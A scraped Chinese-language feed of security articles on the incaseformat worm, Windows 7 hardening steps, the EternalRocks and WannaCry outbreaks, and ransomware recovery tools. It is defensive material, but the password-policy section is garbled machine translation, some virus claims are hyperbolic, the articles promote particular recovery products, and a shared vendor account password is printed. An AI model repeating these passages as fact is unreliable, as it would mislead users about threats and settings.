西西軟件 - 安全中心 http://www.pirinnaturalssoapandspa.com/ 安全中心 zh-cn http://www.pirinnaturalssoapandspa.com Copyright 2010 http://www.pirinnaturalssoapandspa.com, All Rights Reserved 2021/4/22 13:08:14 [數據庫安全]incaseformat病毒突襲,失易得數據恢復軟件助你保護電腦資料 http://www.pirinnaturalssoapandspa.com//html/346676_1.html 西西 數據庫安全 2021/1/14 10:31:06 <p>當前網絡上各種病毒橫行,大家在使用電腦時經常容易中招,除了影響自己的工作、學習進程,許多資料也可以被影響、消失,失易得數據恢復助你進行電腦數據防護。</p><p>1月13日,很多用戶的電腦突遭“incaseformat病毒”侵害,電腦上除C盤外,文件莫名被刪除,且磁盤中可能被創建“incaseformat”文本文檔。<strong>“</strong><strong>incaseformat病毒</strong><strong>”</strong>早在2009年就開始爆發,2021年1月13日又突襲,遇到這個情況應該如何應對呢?</p><p><strong>什么是</strong><strong>“</strong><strong>incaseformat病毒</strong><strong>”?</strong></p><p><strong>危害等級:</strong>高危,可導致用戶數據丟失。</p><p><strong>incaseformat病毒:</strong>&nbsp;該蠕蟲病毒執行后會自復制到系統盤Windows目錄下,并創建注冊表自啟動,一旦用戶重啟主機,使得病毒母體從Windows目錄執行,病毒進程將會遍歷除系統盤外的所有磁盤文件進行刪除,對用戶造成不可挽回的損失。</p><p><strong>怎么判斷你的電腦是否感染了</strong><strong>“</strong><strong>incaseformat病毒</strong><strong>”?</strong></p><p>1、除C盤外的文件被莫名刪除</p><p>2、下載失易得文件快搜、everything這類的文件對電腦文件進行掃描查找。</p><p style="text-align:center;"><img src="https://p.e5n.com/up/2021-1/16105916958476988.png" title="incaseformat病毒突襲,失易得數據恢復軟件助你保護電腦資料" alt="incaseformat病毒突襲,失易得數據恢復軟件助你保護電腦資料"/></p><p>3、利用360安全衛士等安全軟件,對系統上存在的病毒文件進行查殺。</p><p style="text-align:center;"><img src="https://p.e5n.com/up/2021-1/16105917047225645.png" title="incaseformat病毒突襲,失易得數據恢復軟件助你保護電腦資料" alt="incaseformat病毒突襲,失易得數據恢復軟件助你保護電腦資料"/></p><p><strong>如果已經中招:“</strong><strong>incaseformat病毒</strong><strong>”,如何處理(非常重要):</strong></p><p>1、不要再對硬盤進行任何讀寫的操作;</p><p>2、再未處理完病毒的情況下,切忌重啟電腦;</p><p>3、數據恢復軟件有概率找回被病毒誤刪的文件。</p><p><strong>關于數據恢復恢復軟件的選擇:</strong></p><p>1、選擇正規官方下載或者官網授權的數據恢復軟件,避免在下載數據恢復軟件時遭遇“<strong>incaseformat病毒</strong>”感染;</p><p>2、選擇數據恢復軟件需要選擇具備:“深度數據恢復”功能的軟件;</p><p>3、數據恢復不是100%可以恢復的,需要盡快恢復,避免再對硬盤進行讀寫操作,以免造成數據覆蓋;</p><p>4、選擇具備預覽功能的數據恢復軟件,推薦大品牌:“失易得數據恢復”、“快易數據恢復”等。</p><p style="text-align:center;"><img src="https://p.e5n.com/up/2021-1/16105917133295423.png" title="incaseformat病毒突襲,失易得數據恢復軟件助你保護電腦資料" alt="incaseformat病毒突襲,失易得數據恢復軟件助你保護電腦資料"/></p><p><strong>重要提醒:</strong></p><p>360安全衛士的專家提醒:<strong>“</strong><strong>incaseformat病毒</strong><strong>”</strong>可能在2021年1月23日、2月4日再次來襲,希望大家做好查殺和數據備份恢復操作。</p> [病毒漏洞]如何修復win7系統高危漏洞 windows系統安全配置基線方法 http://www.pirinnaturalssoapandspa.com//html/300935_1.html 西西 病毒漏洞 2019/5/29 20:02:46 <p>很多企業員工的電腦在使用過程中很少會進行安全漏洞的升級檢測的,這會導致基線配置工作很難展開。一般情況下在運行的系統沒有出問題前都不會想到這些問題,除非遇到了上級檢查或者自身發現了安全漏洞的情況才會想著解決修復漏洞等工作。這里西西列出了一些常見的高危漏洞及修復方法,大家可以按照下面的步驟來操作。</p><p><span style="color: rgb(112, 48, 160); font-size: 18px;"><strong>檢查密碼最短使用期限</strong></span></p><p><strong>Windows 安全基線建議設置為 1 天的最短密碼使用期限。</strong></p><p>設置為 0 天數允許立即更改密碼,不建議這樣做。 組合立即更改密碼與密碼歷史記錄讓人重復更改密碼,直到滿足密碼歷史記錄要求并再次重建原始密碼。 例如,假設的密碼是&quot;Ra1ny day !&quot; 和歷史記錄要求為 24。 如果最小密碼使用期限為 0,可以更改密碼 24 時間在最后更改回&quot;Ra1ny day !&quot;之前的行。&nbsp;最短密碼 13 歲以下的 1 天阻止的。</p><p>如果你的用戶設置密碼,并且你希望用戶可以更改管理員定義的密碼,你必須選擇用戶必須登錄時須更改密碼下一步復選框。 否則,用戶將無法更改密碼,直到指定的最短密碼使用期限天數。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/201905291857204973997.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>修復建議:</strong></span></p><p>win+R打開命令提示符,運行命令“gpedit.msc”打開組策略編輯器</p><p>瀏覽到路徑“本地計算機策略\計算機配置\Windows設置\安全設置\帳戶策略\密碼策略”,在右邊窗格中找到“密碼最短存留期(使用期限)”,配置為非0值。如果希望“強制密碼歷史”有效,則需要將密碼最短使用期限設置為大于 0 的值。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/20195291858438158.png"/></p><p><span style="color: rgb(112, 48, 160); font-size: 18px;"><strong>445端口狀態是否關閉:</strong></span></p><p>按 WIN+R 組合鍵打開運行對話框(不知道哪個是WIN鍵?),輸入 cmd ,按回車鍵,打開 dos 窗口。</p><p>然后輸入如下命令:</p><p>netstat -ano -p tcp | find &quot;445&quot;</p><p>如果沒有返回任何記錄,則說明已經成功關閉了445端口。如果有返回記錄,如下圖所示,則需要在注冊表中關閉該端口。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/2019529192482643.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>修復步驟:</strong></span><br/></p><p>1、運行regedit打開注冊表</p><p>2、依次依次點擊注冊表選項”HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters“,進入NetBT這個服務的相關注冊表項。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/201905291907559756346.png"/></p><p>3、在右邊空白處右擊新建“QWORD(64位)值”,然后重命名為“SMBDeviceEnabled”,再把這個子鍵的值改為0。</p><p>4、之后win7還要在service中設置</p><p>依次點擊“開始”,“運行”,輸入services.msc,進入服務管理控制臺。然后,找到server服務,雙擊進入管理控制頁面。把這個服務的啟動類型更改為“禁用”,服務狀態更改為“停止”,最后點擊應用即可。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/20195291910132762.png"/></p><p>現在就已經關閉了445端口。</p><p><span style="color: rgb(112, 48, 160); font-size: 18px;"><strong>檢查是否已限制匿名用戶連接</strong></span></p><p>win+R打開命令提示符,運行命令“gpedit.msc”打開組策略編輯器</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/2019529191372949.png"/></p><p>瀏覽到路徑“本地計算機策略\計算機配置\Windows設置\安全設置\本地策略\安全選項”,在右邊窗格中找到“網絡訪問: 不允許 SAM 帳戶和共享的匿名枚舉”</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/201952919146972.png"/></p><p>配置為“啟用”(在Windows2000下,將“對匿名連接的額外限制”配置為“不允許枚舉SAM賬號和共享”)。</p><p><span style="color: rgb(112, 48, 160); font-size: 18px;"><strong>檢查是否已修改默認的遠程桌面(RDP)服務端口:</strong></span></p><p>配置遠程服務器時候有一個非常重要的工作,為了遠程控制方便經常要啟用windows的遠程桌面終端,自己使用是方便了,但也給系統留下了隱患,如 果系統安全策略配置不好很有可能被人利用而入侵,一般情況下把默認的3389端口改成其它端口可以降低風險,使入侵者不容易利用。</p><p><span style="color: rgb(255, 0, 0);"><strong>修復建議:</strong></span></p><p>1、win+R打開命令提示符,運行命令“regedit”打開注冊表編輯器</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/20195291929565675.png"/></p><p>2、找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server \Wds\rdpwd\Tds\Tcp下PortNumber鍵的鍵值:0xd3d,是16進制,也就是10進制的3389,也就是RDP協議的端口,這里可以修改成d39。</p><p>3、瀏覽到路徑“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/2019529193168078.png"/></p><p>4、修改名稱為“PortNumber”的數值的數據,使其不等于標準值(注意:標準值為16進制表示)。這里可以修改成d39。</p><p>5、然后重啟電腦就可以了。</p><p><span style="color: rgb(112, 48, 160); font-size: 18px;"><strong>檢查是否已開啟Windows防火墻:</strong></span></p><p>在Windows2000中,沒有Windows防火墻,不檢查此項;</p><p>在WindowsXP及其SP1中,打開控制面板,找到“網絡連接”,打開“本地連接”的“屬性”對話框,切換到“高級”選項卡,勾選“通過限制或阻止來自Internet…”,并點擊下方“設置”按鈕設置例外端口;</p><p>在其余版本的Windows中,打開控制面板,找到“Windows防火墻”,將當前網絡位置的防火墻配置為“啟用”,并根據實際需求設置例外。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/20195291943218484.png"/></p><p><span style="color: rgb(112, 48, 160); font-size: 18px;"><strong>檢查是否已啟用密碼復雜性要求:</strong></span></p><p>由于域的規約而導致的問題,問題在于密碼設定不符合策略組的規約。此時需要到域策略中設置響應選項來降低密碼的復雜度。(默認的復雜度需要至少7字符,且包含多個字母和數字)</p><p><span style="color: rgb(255, 0, 0);"><strong>修復建議:</strong></span></p><p>win+R打開命令提示符,運行命令“gpedit.msc”打開組策略編輯器</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/2019529194531264.png"/></p><p>瀏覽到路徑“本地計算機策略\計算機配置\Windows設置\安全設置\帳戶策略\密碼策略”,在右邊窗格中找到“密碼必須符合復雜性要求”,雙擊打開配置為“已啟用”。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/20195291946332552.png"/></p><p><span style="color: rgb(112, 48, 160); font-size: 18px;"><strong>檢查是否已刪除可遠程訪問的注冊表路徑和子路徑:</strong></span></p><p>Win7系統支持遠程訪問,很大程度上方便了用戶的許多操作,但在遠程訪問中,Win7也開啟了風險極高的可遠程訪問注冊表的路徑,給系統安全帶來了極大的隱患</p><p><span style="color: rgb(255, 0, 0);"><strong>修復建議:</strong></span></p><p>1、單擊開始按鈕。在搜索欄里面輸入本地安全,然后打開本地安全組策略,知道口令的可以直接在運行對話框里面打開。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/20195291948263615.png"/></p><p>2、在左側標簽,展開安全設置--本地策略--安全選項。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/2019529194914203.png"/></p><p>3、找到網絡訪問:可遠程訪問的注冊表路徑和子路徑。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-5/2019529195540609.png"/></p><p>4、刪除注冊表路徑,確定即可關閉遠程訪問了。</p> [系統安全]永恒之石病毒厲害嗎 永恒之石病毒查殺方法一覽 http://www.pirinnaturalssoapandspa.com//html/156044_1.html 西西 系統安全 2017/5/23 15:34:05 <p>永恒之藍勒索病毒已經過時了,現在又出了新病毒永恒之石,比勒索病毒還要厲害,相當于7個勒索病毒,所以大家一定要有防范意識,為了防患于未然下面小編就來給大家介紹一下查殺方法!</p><h3>永恒之石NSA漏洞專殺方法:</h3><p>1、關閉路由DMZ</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395245368.png"/></p><p>2、禁止部分端口<br/>已知被攻擊的端口有<br/>135 137 138 139 445&nbsp;<br/>關閉方法:<br/>(1)、控制面板-windows防火墻-高級設置。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395222671.png"/></p><p><br/>(2)、點擊入站規則。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395256322.png"/></p><p>(3)、新建規則。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395375257.png"/></p><p>(4)、選擇端口,下一步。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395397691.png"/></p><p>(5)、選擇一個需要關閉的端口</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395318908.png"/></p><p>(6)、阻止連接</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395346950.png"/></p><p>將其他端口也依次如上操作即可</p><p>解決方法二</p><p>(1)、打開組策略。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395352559.png"/></p><p>(2)、建立一個策略。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395380601.png"/></p><p>(3)、如圖建立規則。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395386210.png"/></p><h3>永恒之石NSA漏洞專殺如何防護:</h3><p>一、目前微軟已發布補丁MS17-010修復了“永恒之藍”攻擊的系統漏洞,請盡快為電腦安裝此補丁,網址為https://technet.microsoft.com/zh-cn/library/security/MS17-010;對于XP、2003等微軟已不再提供安全更新的機器,建議升級操作系統版本,或關閉受到漏洞影響的端口,可以避免遭到勒索軟件等病毒的侵害。</p><p>二、一旦發現中毒機器,立即斷網。</p><p>三、啟用并打開“Windows防火墻”,進入“高級設置”,在入站規則里禁用“文件和打印機共享”相關規則。關閉UDP135、445、137、138、139端口,關閉網絡文件共享。</p><p>四、嚴格禁止使用U盤、移動硬盤等可執行擺渡攻擊的設備。</p><p>五、盡快備份自己電腦中的重要文件資料到存儲設備上。</p><p>六、及時更新操作系統和應用程序到最新的版本。</p><p>七、加強電子郵件安全,有效的阻攔掉釣魚郵件,可以消除很多隱患。</p><p>八、安裝正版操作系統、Office軟件等。</p><p>&nbsp;</p> [系統安全]永恒之石病毒怎么預防 永恒之石病毒防御查殺方法 http://www.pirinnaturalssoapandspa.com//html/156040_1.html 西西 系統安全 2017/5/23 15:30:42 <p>永恒之石病毒已經開啟,比之前的永恒之藍病毒更加厲害,永恒之石病毒頂7個nas病毒,大家也不可小覷,如果你還沒有防范,那么就趕緊來看看永恒之石病毒防御方法吧!</p><h3>新病毒永恒之石是什么病毒?</h3><p align="center"><img src="https://pic.cr173.com/up/2017-5/201705231532371233152.png"/></p><p>本月月初,WannaCry病毒就癱瘓了許多國家的醫院、學校和辦公機構,受影響的電腦超過30萬臺,不過這個病毒也只是用了2個NSA漏洞。在WannaCry肆虐幾天后,網絡上還出現了與它共用漏洞的新病毒Adylkuzz,該病毒不勒索比特幣,而是利用用戶計算機挖礦(挖掘虛擬貨幣)。</p><p>現在,則又輪到了“永恒之石”??肆_地亞計算機緊急響應小組的網絡安全專家米羅斯拉夫首先發現了異動,他還在GitHub上對病毒進行了介紹。</p><p>NSA泄露的工具大多與標準文檔分享技術有關,它們來自微軟Windows Server Message Block,也是WannaCry能快速傳播的罪魁禍首。微軟今年3月就封堵了漏洞,但由于人們沒有升級電腦,因此很容易被感染。</p><p>與WannaCry不同,現在永恒之石還處于安靜的潛伏狀態,感染一臺電腦后,它會下載Tor(洋蔥路由)的個人瀏覽器并向病毒隱藏的服務器發信號。</p><p>隨后就是24小時的潛伏期,在這之內病毒會按兵不動。但一天時間過去后,服務器會啟動,病毒和開始下載并自我復制,這就意味著安全專家的研究進度會被拖慢一天。</p><h3>新病毒永恒之石如何防范 永恒之石病毒具體查殺方法</h3><p>眼下,永恒之石雖然在不斷傳播,但還處在休眠狀態。米羅斯拉夫警告稱,這款病毒可能隨時會武器化,它的策略與WannaCry的手段如出一轍,先感染大量電腦再集中爆發。</p><p>由于一直保持神秘,因此永恒之石到底感染了多少電腦現在還不清楚,同時它到底會成為什么樣的攻擊武器也是個謎。Plixer 認為這款病毒可能會變成勒索病毒或特洛伊木馬,對銀行發動攻擊。</p><p>WannaCry事件后,NSA受到了各界的批評,美國國會甚至有了新提案,要求政府把手上的網絡攻擊武器交給獨立的審查委員會。對于此事,NSA并未發表評論。</p><p>&nbsp;</p> [系統安全]新病毒永恒之石是什么 永恒之石和永恒之藍有什么區別 http://www.pirinnaturalssoapandspa.com//html/156035_1.html 西西 系統安全 2017/5/23 15:26:12 <p>今天媒體發布了新病毒永恒之石也已經入侵了多家企業,勒索病毒還沒有完全消滅,永恒之石病毒已經來襲,那么這個病毒到底有什么厲害之處了,和永恒之藍病毒又有什么區別呢,下面小編就來給大家介紹一下!</p><p align="center"><img src="https://pic.cr173.com/up/2017-5/201705231528569172148.png"/></p><h3>病毒介紹</h3><p>勒索病毒WannaCry的余波還未消散,就有更恐怖的新病毒出現了。上周末,研究人員發現了名為EternalRocks(永恒之石)的新病毒,這個病毒變本加厲,居然一次用了7個來自NSA的漏洞。安全專家稱如果該病毒突然發動攻擊,將帶來“末日”般的恐怖后果。</p><p>本月月初,WannaCry病毒就癱瘓了許多國家的醫院、學校和辦公機構,受影響的電腦超過30萬臺,不過這個病毒也只是用了2個NSA漏洞。在WannaCry肆虐幾天后,網絡上還出現了與它共用漏洞的新病毒Adylkuzz,該病毒不勒索比特幣,而是利用用戶計算機挖礦(挖掘虛擬貨幣)。</p><p>現在,則又輪到了“永恒之石”??肆_地亞計算機緊急響應小組的網絡安全專家米羅斯拉夫首先發現了異動,他還在GitHub上對病毒進行了介紹。</p><p>NSA泄露的工具大多與標準文檔分享技術有關,它們來自微軟Windows Server Message Block,也是WannaCry能快速傳播的罪魁禍首。微軟今年3月就封堵了漏洞,但由于人們沒有升級電腦,因此很容易被感染。</p><p>與WannaCry不同,現在永恒之石還處于安靜的潛伏狀態,感染一臺電腦后,它會下載Tor(洋蔥路由)的個人瀏覽器并向病毒隱藏的服務器發信號。隨后就是24小時的潛伏期,在這之內病毒會按兵不動。但一天時間過去后,服務器會啟動,病毒和開始下載并自我復制,這就意味著安全專家的研究進度會被拖慢一天。</p><p>“提供24小時的緩沖期說明黑客們想盡量保持神秘?!卑踩綪lixer CEO邁克爾·帕特森說道?!跋胍獋蓽y并阻止所有病毒,現在幾乎已經不可能了?!?lt;/p><p>眼下,永恒之石雖然在不斷傳播,但還處在休眠狀態。米羅斯拉夫警告稱,這款病毒可能隨時會武器化,它的策略與WannaCry的手段如出一轍,先感染大量電腦再集中爆發。</p><p>由于一直保持神秘,因此永恒之石到底感染了多少電腦現在還不清楚,同時它到底會成為什么樣的攻擊武器也是個謎。Plixer 認為這款病毒可能會變成勒索病毒或特洛伊木馬,對銀行發動攻擊。</p><p>WannaCry事件后,NSA受到了各界的批評,美國國會甚至有了新提案,要求政府把手上的網絡攻擊武器交給獨立的審查委員會。對于此事,NSA并未發表評論。</p> [病毒漏洞]永恒之石病毒怎么預防 永恒之石病毒預防攻略 http://www.pirinnaturalssoapandspa.com//html/155914_1.html 西西 病毒漏洞 2017/5/23 10:00:18 <p>永恒之石病毒怎么預防,永恒之石病毒預防攻略。勒索病毒才過去幾天,研究人員發現了更加恐怖的新病毒-EternalRocks(永恒之石),這個病毒很是強勢,還在潛伏期,小伙伴們需要做好預防措施,永恒之石病毒怎么預防,西西小編為大家帶來永恒之石病毒預防攻略。</p><p><a href="http://www.pirinnaturalssoapandspa.com/soft/491171.html" target="_self"><strong>永恒之石病毒查殺工具下載</strong></a></p><p align="center"><img src="https://pic.cr173.com/up/2017-5/201705231016565722852.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>永恒之石病毒怎么預防</strong></span></p><p>勒索病毒WannaCry的余波還未消散,就有更恐怖的新病毒出現了。上周末,研究人員發現了名為EternalRocks(永恒之石)的新病毒,這個病毒變本加厲,居然一次用了7個來自NSA的漏洞。安全專家稱如果該病毒突然發動攻擊,將帶來“末日”般的恐怖后果。</p><p>克羅地亞計算機緊急響應小組的網絡安全專家米羅斯拉夫首先發現了異動,他還在GitHub上對病毒進行了介紹。</p><p>NSA泄露的工具大多與標準文檔分享技術有關,它們來自微軟Windows Server Message Block,也是WannaCry能快速傳播的罪魁禍首。微軟今年3月就封堵了漏洞,但由于人們沒有升級電腦,因此很容易被感染。</p><p>微軟的小伙伴趕緊升級電腦哦!</p> [病毒漏洞]永恒之石病毒怎么破解 中了永恒之石病毒怎么辦 http://www.pirinnaturalssoapandspa.com//html/155905_1.html 西西 病毒漏洞 2017/5/23 9:39:07 <p>永恒之石病毒怎么破解,中了永恒之石病毒怎么辦。在勒索病毒后,又出現了更加恐怖的新病毒永恒之石,這個病毒一次用了7個來自NSA的漏洞,很是恐怖,永恒之石病毒怎么破解,中了永恒之石病毒怎么辦,西西小編來為大家介紹。</p><p><a href="http://www.pirinnaturalssoapandspa.com/soft/491171.html" target="_self"><strong>永恒之石病毒查殺工具下載</strong></a></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/201705230957176741834.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>永恒之石病毒怎么破解</strong></span></p><p>勒索病毒WannaCry的余波還未消散,就有更恐怖的新病毒出現了。上周末,研究人員發現了名為EternalRocks(永恒之石)的新病毒,這個病毒變本加厲,居然一次用了7個來自NSA的漏洞。安全專家稱如果該病毒突然發動攻擊,將帶來“末日”般的恐怖后果。</p><p>克羅地亞計算機緊急響應小組的網絡安全專家米羅斯拉夫首先發現了異動,他還在GitHub上對病毒進行了介紹。</p><p><strong>NSA泄露的工具大多與標準文檔分享技術有關,它們來自微軟Windows Server Message Block,也是WannaCry能快速傳播的罪魁禍首。微軟今年3月就封堵了漏洞,但由于人們沒有升級電腦,因此很容易被感染。</strong></p><p>與WannaCry不同,現在永恒之石還處于安靜的潛伏狀態,感染一臺電腦后,它會下載Tor(洋蔥路由)的個人瀏覽器并向病毒隱藏的服務器發信號。</p><p>隨后就是24小時的潛伏期,在這之內病毒會按兵不動。但一天時間過去后,服務器會啟動,病毒和開始下載并自我復制,這就意味著安全專家的研究進度會被拖慢一天。</p><p>“提供24小時的緩沖期說明黑客們想盡量保持神秘?!卑踩綪lixer CEO邁克爾·帕特森說道?!跋胍獋蓽y并阻止所有病毒,現在幾乎已經不可能了?!?lt;/p><p>眼下,永恒之石雖然在不斷傳播,但還處在休眠狀態。米羅斯拉夫警告稱,這款病毒可能隨時會武器化,它的策略與WannaCry的手段如出一轍,先感染大量電腦再集中爆發。</p><p>由于一直保持神秘,因此永恒之石到底感染了多少電腦現在還不清楚,同時它到底會成為什么樣的攻擊武器也是個謎。Plixer 認為這款病毒可能會變成勒索病毒或特洛伊木馬,對銀行發動攻擊。</p><p>WannaCry事件后,NSA受到了各界的批評,美國國會甚至有了新提案,要求政府把手上的網絡攻擊武器交給獨立的審查委員會。對于此事,NSA并未發表評論。</p> [防護教程]360勒索蠕蟲病毒文件恢復工具使用方法 勒索病毒文件恢復圖文教程 http://www.pirinnaturalssoapandspa.com//html/154059_1.html 西西 防護教程 2017/5/15 11:38:07 <p>360勒索蠕蟲病毒文件恢復工具使用方法,勒索病毒文件恢復圖文教程,針對近日出現的WNCRY病毒瘋狂攻擊,360推出的勒索蠕蟲病毒文件恢復工具可以有效避免病毒攻擊和恢復被破壞的文件,下面帶來360勒索蠕蟲病毒文件恢復工具使用方法圖文教程。</p><p><span style="color: rgb(255, 0, 0);"><strong>360勒索蠕蟲病毒文件恢復工具下載地址:<a href="http://www.pirinnaturalssoapandspa.com/soft/484666.html" target="_blank">點擊下載</a></strong></span></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/201705151450367696958.png"/></p><p><br/></p><p><span style="color: rgb(255, 0, 0);"><strong>360勒索蠕蟲病毒文件恢復工具使用方法教程</strong></span></p><p>選擇加密文件所在驅動器</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051514504049501.jpg"/></p><p>掃描后,選擇要恢復的文件</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051514504021194.jpg"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051514504049764.jpg"/></p><p>強烈建議您選擇把恢復的文件保存在干凈的移動硬盤或U盤上</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051514504038283.jpg"/></p><p>本工具的文件恢復成功率會受到文件數量、時間、磁盤操作情況等因素影響。一般來說,中毒后越早恢復,成功的幾率越高。</p><p>我們盡力而為,但無法確保能夠成功恢復多大比例的文件。祝您好運!</p> [防護教程]金山毒霸怎么修復比特幣勒索病毒 免費修復工具介紹 http://www.pirinnaturalssoapandspa.com//html/154008_1.html 西西 防護教程 2017/5/15 11:09:33 <p>比特幣勒索病毒是現在最廣泛傳播的病毒,不少小伙伴最怕的就是電腦有重要東西出現病毒該怎么辦,因此就讓小編給大家詳細的講講怎么進行修復,想知道的小伙伴一起來看看吧。</p><p align="center"><img src="https://pic.cr173.com/up/2017-5/14948182301622342.png"/></p><p><strong>免費修復工具介紹</strong></p><p><strong>金山毒霸免費查殺軟件:<a href="http://www.pirinnaturalssoapandspa.com/soft/484134.html" _src="https://pic.cr173.com/soft/484134.html">http://www.pirinnaturalssoapandspa.com/soft/484134.html</a></strong></p><p>如果你的電腦感染了勒索病毒后,病毒首先將電腦上的原始文件(圖片、文檔等加密),生成一個加密文件,并刪除原始文件,而如果你想解決這個事情,只有三個辦法:</p><p>1、給勒索者付錢,但真的這么做了對方還不確定是否給你解密;</p><p>2、下載殺毒軟件進行幫忙,比如昨天金山毒霸推出了專業數據恢復工具,恢復概率較高(下載金山毒霸后,用免費帳號ksda679795862,密碼:kingsoft來進行恢復數據);</p><p>3、使用備份(云盤、網盤以及個人移動數據盤),這跟大家以往良好的使用習慣有關,但是數據恢復前一定要進行殺毒,不要再次感染。</p> [防護教程]永恒之藍勒索病毒怎么破解 永恒之藍勒索病毒解決方法介紹 http://www.pirinnaturalssoapandspa.com//html/153943_1.html 西西 防護教程 2017/5/15 9:34:29 <p>永恒之藍勒索病毒不少小伙伴遇到都很害怕不知道怎么解決,有什么好的辦法進行解決,因此不知道的小伙伴們,就讓小編給大家詳細的講講解決辦法吧。</p><p align="center"><strong><img src="https://pic.cr173.com/up/2017-5/14948128227440290.png"/></strong></p><p><strong>永恒之藍勒索病毒解決方法介紹</strong></p><p>據安全專家介紹,目前發現的蠕蟲會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入執行勒索程序、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。</p><p>大型機構具有網絡龐大、接入方式復雜、設備數量眾多、敏感數據多、業務連續性要求高等特點,尤其是生產系統的可用性和可靠性要求極高,出現安全事件的負面影響很大。為切實避免“永恒之藍”勒索蠕蟲對業務系統和辦公終端帶來影響,專家建議通過集中管控的方式對防護策略進行統一下發和管理。</p><p>針對關于大型機構的 “永恒之藍”勒索蠕蟲攻擊防范,360安全監測與響應中心的專家表示:</p><p>首先應該確認影響范圍,確保Win7及以上版本的系統安裝MS17-010補丁。Win7以下的Windows XP/2003開啟SMB服務。</p><p>針對大型機構的應急防范措施,專家建議應從DMZ非軍事化隔離區、生產區域、辦公區域、互聯網邊界的網絡和終端層面全面做好緊急抑制工作。</p><p>安全專家強烈建議 網絡管理員在網絡邊界的防火墻上阻斷445端口的訪問,如果邊界上有IPS和360天堤智慧防火墻之類的設備,請升級設備的檢測規則到最新版本并設置相應漏洞攻擊的阻斷,直到確認網內的電腦已經安裝了MS17-010補丁或關閉了Server服務。</p> [防護教程]360nsa武器庫免疫工具在哪 nsa武器庫免疫工具使用方法教程 http://www.pirinnaturalssoapandspa.com//html/153961_1.html 西西 防護教程 2017/5/15 8:20:50 <p>360nsa武器庫免疫工具在哪,nsa武器庫免疫工具使用方法教程,針對近日出現的勒索病毒,360推出了nsa武器庫免疫工具(附下載地址),可以應對勒索病毒攻擊,同時修復用戶的windows電腦漏洞,下面西西帶來360nsa武器庫免疫工具使用方法教程。</p><p align="center"><img src="https://pic.cr173.com/up/2017-5/201705151014536677427.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>360nsa武器庫免疫工具下載地址:<a href="http://www.pirinnaturalssoapandspa.com/soft/484308.html" target="_blank">點擊下載</a></strong></span></p><p>近百國遭黑客攻擊。昨日,全球電腦用戶遭遇新的病毒大范圍攻擊。一個勒索病毒變種在全球范圍內出現爆發態勢,全球多個國家爆發勒索病毒攻擊,中國高校等內網用戶也出現感染情況,眾多師生的電腦文件被病毒加密,昨日已有包括中山大學等高校紛紛發布緊急通知。</p><p>廣州日報全媒體記者昨日采訪國內信息安全專家獲悉,該病毒主要是利用Windows的445端口傳播,而此前部分運營商對個人用戶封掉了445端口,同時,目前已有國內信息安全公司開發出快速升級工具,可以應對勒索病毒攻擊。專家表示,個人電腦用戶不必過于驚慌。</p><p><span style="color: rgb(255, 0, 0);"><strong>nsa武器庫免疫工具使用方法教程</strong></span></p><p style="text-align: center;"><embed height="415" width="544" quality="high" allowfullscreen="true" type="application/x-shockwave-flash" src="//static.hdslb.com/miniloader.swf" flashvars="aid=10543828&amp;page=1" 